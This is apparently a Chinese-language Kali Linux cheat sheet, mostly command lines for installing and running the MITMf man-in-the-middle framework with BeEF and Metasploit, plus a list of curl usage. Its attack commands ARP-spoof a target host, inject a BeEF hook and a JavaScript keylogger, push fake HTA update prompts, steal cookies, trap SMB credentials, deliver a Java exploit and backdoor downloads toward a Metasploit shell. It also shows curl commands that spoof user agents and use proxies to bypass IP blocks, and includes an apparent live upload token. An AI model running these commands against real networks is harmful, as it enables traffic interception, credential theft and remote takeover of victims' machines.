安装方式一:
安装32位环境:
root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
安装Mitmf:
root@kali:~# apt-get install mitmf
root@kali:~# pip uninstall Twisted
root@kali:~# wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
root@kali:~# pip install ./Twisted-15.5.0.tar.bz2
安装方式二:
root@kali:~# get clone https://github.com/byt3bl33d3r/MITMf.git
安装装python-nfqueue+pefile模块:
root@kali:~# sudo apt-get install python-nfqueue,pefile
root@kali:~# sudo apt-get install mitmf*
root@kali:~# pip uninstall twisted
root@kali:~# wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
root@kali:~# pip install ./Twisted-15.5.0.tar.bz2
启动Beef:
root@kali:~# cd /usr/share/beef-xss/
root@kali:~# ./beef
利用BeEFAutorun结合Beef-XSS自动工具:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --beefautorun
Mitmf中间人注入XSS脚本,作为中间人连接网页并插入JS:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http:// 192.168.1.114:3000/hook.js
注入Html iframe框架:
root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.114 --inject --html-url http://www.freebuf.com
注入JavaScript:
root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http://linvex.xxx.cn/test.js
注入键盘记录JS:
root@kali:~# mitmf -i eth0 --spoof –-arp –-gateway 192.168.1.1 –-target 192.168.1.114 --jskeylogger
查看网页Http Response头指纹信息:
root@kali:~# curl -i url
查看网页HTTP通信过程信息:
root@kali:~# curl -v url
查看网址301+302跳转访问情况:
root@kali:~# curl -IL url
抓取页面内容到一个文件中:
root@kali:~# curl -o home.html url
模拟服务器Post请求:
root@kali:~# curl -vX POST "URL" -d "name=123.jpg"
模拟客服端发送表单数据:
root@kali:~# curl -d "user=aaa&password=12345" http://www.aaa.com/login.php
方案一:
表单XML上传代码:
<form method="post" action="http://upload.qiniu.com/"
enctype="multipart/form-data">
<input name="key" type="hidden" value="<resource_key>">
<input name="token" type="hidden" value="<upload_token>">
<input name="file" type="file" />
</form>
模拟表单信息上传:
root@kali:~# curl -v -F 'key=21211' -F 'token=um6IEH7mtwnwkGpjImD08JdxlvViuELhI4mFfoeL:ibL-L03gPbF0Yyjf1XlWiwkRk1s=:eyJzY29wZSI6ImphdmFkZW1vIiwiZGVhZGxpbm' -F 'file=@/Users/dxy/sync/photo3.jpg' 183.136.139.10
模拟代理节点:
root@kali:~# curl -voa up.qiniu.com -F"token=um6IEH7mtwnwkGpjImD08JdxlvViuELhI4mFfoeL:ibL-L03gPbF0Yyjf1XlWiwkRk1s=:eyJzY29wZSI6ImphdmFkZW1vIiwiZGVhZGxpb" -F"file=@10M.file -x 1.1.1.1:80
方案二:
表单XML上传代码:
<form method="POST" enctype='multipart/form-data' action="upload.cgi">
<input type=file name=upload>
<input type=submit name=press value="OK">
</form>
利用Curl上传文件:
root@kali:~# curl --form upload=@localfilename --form press=OK url
保存服务器返回Cookie到文件中:
root@kali:~# curl -c cookies url
使用Cookie文件做后续工作:
root@kali:~# curl -b cookies url
利用Curl发送Cookie:
root@kali:~# curl --cookie "name=xxx" url
利用Curl绕过User-Agent认证:
curl --user-agent "User Agent" url
利用Curl代理绕过屏蔽IP:
root@kali:~# curl -x 24.10.28.84:32779 -o home.html url
模拟表单信息,模拟登录,保存头信息:
root@kali:~# curl -D ./cookie_D.txt -F log=aaaa -F pwd=xxxx url/login.php
利用Hsts模块执行ARP欺骗并抓取密文:
root@kali:~# mitmf -i eth0 --spoof --arp --hsts --gateway 192.168.0.1 --targets 192.168.1.114
利用AppCachePoison模块进行ARP投毒:
root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 –-target 192.168.1.114 --app cache poison
利用HTA Drive-By注入假更新通知并提示下载:
root@kali:~# mitmf -i eth0 --spoof –-arp –-gateway 192.168.1.1 –-target 192.168.1.114 --hta drive-by
利用BrowserSniper执行HTA Drive-by攻击:
root@kali:~# mitmf -i eth0 --spoof –-arp –-gateway 192.168.1.1 –-target 192.168.1.114 --browsersniper
利用Jskeylogger模块监听键盘记录:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --jskeylogger
利用Upsidedownternet模块获取图片:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.0.114 --upsidedownterne
利用Screen模块截屏:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --screen
利用Replace模块替换靶机网页:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --replace
利用Ferretng模块获取靶机Cookie:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.11 --target 192.168.1.114 --ferretng
利用Cachekill模块清除靶机Cookies:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.11 --target 192.168.1.114 --cachekill
利用Browserprofiler模块获取浏览器及插件信息:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --browserprofiler
利用Smbtrap模块进行SMB打印服务445端口:
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --smbtrap
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --smbauth
利用Javapwn模块进行Java漏洞攻击:
root@kali:~# mitmf -i eth0 --spoof --gateway 192.168.217.2 --target 192.168.1.114 --javapwn --msfip 192.168.1.100
启动Metasploit模块并监听:
root@kali:~# msfconsole
root@kali:~# use exploit/multi/handler
root@kali:~# set LHOST 192.168.1.114
root@kali:~# set LPORT 1447
root@kali:~# run
欺骗靶机下载文件:
mitmf --iface eth0 --spoof --gateway 192.168.1.1 --target 192.168.1.114 --filepwn
注:通过MSF获取靶机Shell即可拿到主机!
网友评论